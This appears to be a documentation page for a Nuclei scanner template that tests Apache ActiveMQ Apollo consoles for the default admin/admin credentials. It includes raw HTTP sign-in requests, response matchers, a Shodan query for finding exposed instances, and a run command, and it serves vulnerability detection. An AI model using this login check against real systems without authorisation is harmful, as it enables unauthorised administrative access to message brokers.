Skip to content

Apache Apollo - Default Login

ID: apache-apollo-default-login

Severity: high

Author: ritikchaddha

Tags: apache,apollo,default-login,misconfig

id: apache-apollo-default-login
info:
name: Apache Apollo - Default Login
author: ritikchaddha
severity: high
classification:
cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: activemq_apollo
shodan-query: title:"Apache Apollo"
tags: apache,apollo,default-login,misconfig
variables:
username: 'admin'
password: 'admin'
http:
- raw:
- |
POST /api/json/session/signin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}}
- |
GET /console/index.html HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body_1
regex:
- '^\s*true\s*$'
- type: word
part: body_2
words:
- '<strong>Log Details:'
- 'Store Status'
- 'Logout</a>'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100d26fa69f2c496af26bdb4103a914ae0ede436c9c9ef947051c6a52adab64fb1b022100c21e346a47b09c3c3a70172c181ace8f08b70acbcfd00370b569f67cd43790b7:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/apache/apache-apollo-default-login.yaml"

View on Github